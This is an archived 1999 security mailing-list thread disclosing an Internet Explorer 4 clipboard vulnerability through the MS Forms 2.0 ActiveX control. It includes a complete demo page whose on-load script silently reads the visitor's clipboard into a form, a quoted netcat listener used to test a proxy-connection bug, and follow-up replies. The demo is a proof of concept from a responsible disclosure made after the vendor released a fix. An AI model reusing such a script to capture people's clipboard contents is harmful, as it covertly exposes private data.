cuartangojc-clipboard-msie.txt

`Date: Thu, 21 Jan 1999 15:59:15 +0100  
From: Juan Carlos Garcia Cuartango <[email protected]>  
To: [email protected]  
Subject: New IE4 privacy issue  
  
Greetings,   
  
There is a new IE 4 issue affecting privacy. The clipboard content can be made public by a javascript code two lines long.  
I reported the problem to Microsoft on Jan 7 and they have posted the corresponding security bulletin and a fix today 21 January.  
Although the vulnerability can be exploited from IE 4 navigator it is not a IE 4 bug. The problem is located in some ActiveX called "MS Forms 2.0"  
that are shipped and installed with the following applications :  
  
  
Microsoft Office 97  
Microsot Outlook 98  
Microsoft Project 98  
Microsoft Visual Basic 5.0  
Other non MS applications based on VB or VBA   
  
  
More info and a demo is available at :  
http://pages.whowhere.com/computers/cuartangojc  
Microsoft security bulletin is :   
http://www.microsoft.com/security/bulletins/ms99-001.asp  
  
  
Regards,  
  
  
Juan Carlos  
  
----------[ http://pages.whowhere.com/computers/cuartangojc/ ]----------  
  
The Clipboard vulnerability  
  
Internet Explorer 4   
Only if you also have installed one of the folowing applications :  
Microsoft Office 97  
Microsot Outlook 98 Microsoft Project 98</small><br>  
Microsoft Visual Basic 5.0 </small></font></td>  
  
Reported to MS Jan 7 1999  
Confirmed and fixed Jan 21 1999.  
http://www.microsoft.com/security/bulletins/ms99-001.asp  
MS Security Bulletin ms99-001  
  
<html>  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<meta name="keywords"  
content="explorer vulnerability,USP ,Cuartango,cuartango vulnerability, clipboard hole,clipboard ,security,security site,security web,hack,security,risk,hole,security hole,explorer">  
<title>The Clipboard vulnerability demo</title>  
</head>  
  
<body onload="GetClipBoard()">  
<script>  
function GetClipBoard()  
{  
tb.paste(); // paste over the Microsoft Forms 2.0 TextBox   
document.forms(0).S1.value=tb.text; // moves the text to the text area box  
if(document.forms(0).S1.value == "")  
alert("Your browser does not have the security hole or your clipboard was empty ");  
else  
alert("Clipboard security hole in browser -- " + navigator.userAgent );  
}  
</script>  
  
  
<h1 align="center"><font color="#FF0000"><small>T<strong>he Clipboard Vulnerability Demo</strong></small></font></h1>  
  
<p align="left"><font face="Arial"><small>According with Microsoft security rules access  
to Windows clipboard content is forbidden to Internet Explorer scripts unless the  
clipboard content was owned by the Explorer itself. If an script performs a  
"paste" operation over an input text box the operation will succeed only if data  
were copied to the clipboard from the Internet Explorer. </small></font></p>  
  
<p align="left"><small><font face="Arial">There is a way to circumvent this protection by  
using a Microsoft Forms 2.0 TextBox ActiveX object. This TextBox object can perform a  
"paste" operation without security restrictions. The clipboard data can then be  
transferred to a form input box and posted to a malicious WEB. The vulnerabilty can also  
be exploited from an e-mail message .</font></small></p>  
  
<p align="left"><small><font face="Arial">This control does not ship with Windows or with  
Internet Explorer, but rather people get it by installing Office 97, Visual Basic 5.0, or  
a couple of other applications, although the exposure for most users would be through  
Internet Explorer.</font></small></p>  
  
<p align="left"><strong><small><font face="Arial">The box below&nbsp; is a Input Text Area  
Box your clipboard text data must be here, if not then do a copy (from any application)  
&nbsp;and reload this page. If this box shows your clipboard content then you are  
affected.</font></small></strong></p>  
  
<form method="POST" action="--WEBBOT-SELF--">  
<!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"  
S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><div  
  
align="center"><center><p><textarea rows="3" name="S1" cols="82"></textarea></p>  
</center></div>  
</form>  
  
<p align="center"><small><font face="Arial"><strong>The box below (blue) is a Microsoft  
Forms 2.0 TextBox ActiveX object, it will also show the clipboard content.</strong></font></small><br>  
<br>  
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169"  
height="23">  
<param name="VariousPropertyBits" value="2894088219">  
<param name="BackColor" value="16776960">  
<param name="Size" value="4480;600">  
<param name="FontHeight" value="200">  
<param name="FontCharSet" value="0">  
<param name="FontPitchAndFamily" value="2">  
</object>  
</p>  
<div align="center"><center>  
  
<table border="0">  
<tr>  
<td style="border: 1px solid"><p align="left"><font face="Arial"><strong><small>The script  
making public the clipboard is very simple :</small></strong><br>  
</font><font COLOR="#000000" face="Courier New" size="2"><br>  
function GetClipBoard()<br>  
{<br>  
tb.paste();  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  
&nbsp;// paste over the MS Forms 2.0 TextBox <br>  
document.forms(0).S1.value=tb.text;&nbsp;&nbsp;// moves the text to the text area box<br>  
}</font></td>  
</tr>  
</table>  
</center></div>  
  
<p align="center"><a href="index.html"><font size="4"><strong>Back to Main Page (More  
BUGS)</strong></font></a></p>  
  
<p align="center"><font color="#FF0000">Created by</font> <a  
  
href="mailto:[email protected]">Juan Carlos Garcia Cuartango</a> </p>  
  
</body>  
</html>  
  
-----------------------------------------------------------------------------------  
  
Date: Mon, 25 Jan 1999 06:45:37 +0100  
From: Drazen Kacar <[email protected]>  
To: [email protected]  
Subject: Re: IE4 Persistent Connection Bug  
  
Joel Moses wrote:  
> The document below details a connection-reuse problem which uses  
> persistent connections even when they have either 1) been specifically  
> disabled, or 2) have been told to close by a server "Connection:  
> close".  
  
[...]  
> ------------------------------------------------------------------  
> $ nc -p 9000 -l  
> GET http://www.somesite.com/ HTTP/1.0  
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,  
> application/vnd.ms-excel, application/msword,  
> application/vnd.ms-powerpoint, */*  
> Accept-Language: en-us  
> Accept-Encoding: gzip, deflate  
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)  
> Host: www.somesite.com  
> Proxy-Connection: Keep-Alive  
>  
> "HTTP/1.1 200 OK"  
> "Connection: close"  
> "Content-Length: 5"  
>  
> "abcde"  
> ------------------------------------------------------------------  
>  
> The browser will display "abcde," and the IE logo will stop  
> circulating. However, the connection will not -- as requested by the  
> server -- close. If you issue another page request in the browser for  
  
You mean "as requested by the origin server." Connection header is hop-by-hop,  
which means that it has a meaning for a connection between origin server  
and proxy server only. Proxy server doesn't have to propagate it to the  
user agent. And there is a Proxy-Connection header in the request.  
I don't know where that one is defined (it isn't in RFC 1945, nor in RFC 2068,  
nor in the latest HTTP/1.1 draft), but I would assume it has to do  
something with open connections between user agent and proxy server.  
  
> a different site, the request will come through on this  
> previously-opened connection, e.g.,:  
>  
> ------------------------------------------------------------------  
> GET http://www.othersite.com/ HTTP/1.0  
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,  
> application/vnd.ms-excel, application/msword,  
> application/vnd.ms-powerpoint, */*  
> Accept-Language: en-us  
> Accept-Encoding: gzip, deflate  
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)  
> Host: www.othersite.com  
> Proxy-Connection: Keep-Alive  
> ------------------------------------------------------------------  
>  
> This clearly violates HTTP/1.0 behavior, with which the browser  
> reports to the server that it complies.  
  
It doesn't. Your netcat "proxy" violates it. Here's a quote from RFC 1945:  
  
Except for experimental applications, current practice requires that  
the connection be established by the client prior to each request and  
closed by the server after sending the response.  
  
> Netscape 4.x behaves correctly and closes the connection itself when  
> faced with the same situation.  
  
See above. The server is responsible for closing the connection. Server  
here means either origin server or proxy server, whichever happens to be  
connected to user agent.  
  
--  
.-. .-. Life is a sexually transmitted disease.  
(_ \ / _)  
| [email protected]  
| [email protected]  
  
-----------------------------------------------------------------------------------  
  
Date: Mon, 25 Jan 1999 15:14:15 -0000  
From: Eamonn Turley <[email protected]>  
To: [email protected]  
Subject: Re: New IE4 privacy issue  
  
Not just Javascript code.  
VB Script, as well.  
  
Anything that can use ActiveX controls, can do it.  
This is all of office, Internet Explorer, Visual Studion (VB, C++ etc),  
Netscape Navigator (I believe) and I believe AutoCAD uses VB-Script, so  
may be able to do this.  
  
`